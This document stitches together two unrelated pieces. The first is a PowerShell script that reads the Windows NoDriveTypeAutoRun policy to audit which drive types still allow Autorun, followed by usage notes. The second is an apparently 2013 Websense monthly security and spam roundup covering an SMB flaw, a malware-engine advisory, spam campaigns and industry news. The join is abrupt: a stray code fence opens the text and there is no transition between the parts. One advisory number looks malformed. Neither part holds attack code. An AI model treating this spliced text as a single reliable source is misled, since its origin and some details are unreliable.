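$driveBits = [ordered]@{
    UnknownType  = 0x01   # drives whose type cannot be determined
    Removable    = 0x04   # USB flash drives, floppy, etc.
    Fixed        = 0x08   # internal hard disks
    Network      = 0x10   # mapped network shares
    CDROM        = 0x20   # CD/DVD media (the advisory leaves this one enabled)
    RamDisk      = 0x40
    Unrecognized = 0x80   # drive types not recognized by the shell
}

function Get-AutorunPolicy {
    # Returns the NoDriveTypeAutoRun mask from the given hive, or $null if unset.
    param([ValidateSet('HKLM','HKCU')][string]$Hive = 'HKLM')
    $path = "${Hive}:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
    $item = Get-ItemProperty -Path $path -Name NoDriveTypeAutoRun -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return [int]$item.NoDriveTypeAutoRun
}

function Test-AutorunRestricted {
    # Lists every non-CD drive type whose Autorun bit is NOT set in the mask.
    param([Parameter(Mandatory)][int]$Mask)
    $stillAllowed = foreach ($type in $driveBits.Keys) {
        if ($type -ne 'CDROM' -and -not ($Mask -band $driveBits[$type])) { $type }
    }
    [pscustomobject]@{
        Mask             = ('0x{0:X2}' -f $Mask)
        StillAllowed     = @($stillAllowed)
        OnlyCdDvdAllowed = (@($stillAllowed).Count -eq 0)
    }
}

# Both hives matter: a user-level policy can be looser than the machine policy.
foreach ($hive in 'HKLM', 'HKCU') {
    $mask = Get-AutorunPolicy -Hive $hive
    if ($null -eq $mask) {
        "${hive}: NoDriveTypeAutoRun is not set; the Windows default applies."
        continue
    }
    "${hive}:"
    Test-AutorunRestricted -Mask $mask | Format-List | Out-String
}
```

Run it in an elevated PowerShell session so that both hives are readable. A mask of 0xFF (or anything that leaves only the CDROM bit clear) means Autorun is confined to optical media; any drive type listed under StillAllowed is one where an Autorun.inf on attached media would still be honored.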

In the middle of February a new vulnerability was discovered in an SMB component of Windows. The Microsoft Security Research & Defense (SRD) team quickly posted a blog on this vulnerability stating that remote code execution is not achievable with it.

At the end of February, Microsoft published a security advisory (24918888) to make customers aware of an update to the Microsoft Malware Protection Engine. It addresses a privately reported vulnerability that could allow elevation of privilege if the Microsoft Malware Protection Engine scans a system after an attacker with valid logon credentials has created a specially crafted registry key. The vulnerability cannot be exploited by anonymous users.

Hello ThreatSeeker. You've got mail!

A recap of the past month kicks off with a noticeable increase in spam, and with spammers going green: recycling templates or slightly modifying older campaigns to give them a more current theme, so that they remain convincing to everyone who reads them.

This was followed by the repeat offender, the magic blue pill with its mystical attributes, just in time for the Valentine's Day rush. This again was aligned almost perfectly with the season, aimed at couples planning romantic getaways. Spammers prove time and time again that they are very much in touch with what is current.

Last, but by no means least, we have the use of social engineering techniques to lure the unsuspecting user into clicking on a link provided within an email. The email message titled "The refreshed site of our company" was not seen in high volumes, but it was an interesting find all the same, because it shared characteristics with malicious Web site compromises, crossing over into the spam domain. This begs the question: could there be a direct correlation between the two?

Security Trends

TippingPoint released details of 22 unpatched vulnerabilities from different vendors. TippingPoint is the operator of the "Zero Day Initiative" bug bounty program. They announced that they would release details 180 days after they become aware of a bug, even if the vendor has not yet released a patch.

Spam images have been swapped for scam alerts on imageshack.us. ImageShack said it found over 300 scam images uploaded to its service and was able to replace them with an alert image within an hour of their being reported.

Suspicious companies have started paying developers to embed spyware into mobile applications. Mobile users typically have less control of their devices than PC users; therefore more care should be taken when installing applications onto mobile devices.

Visa has relaxed its regulatory rules so that European high street merchants who capture at least three-quarters of their take through EMV-enabled chip-and-PIN terminals will no longer have to pass Payment Card Industry Data Security Standard (PCI DSS) audits every year.

 

This month's roundup contributors:
Artem Gololobov
Ping Yan
Grace Timcang
Ulysses Wang
Xue Yang
Amon Sanniez
Lei Li

Filed under:

Ivan Sabo

©2013 Websense, Inc. All Rights Reserved.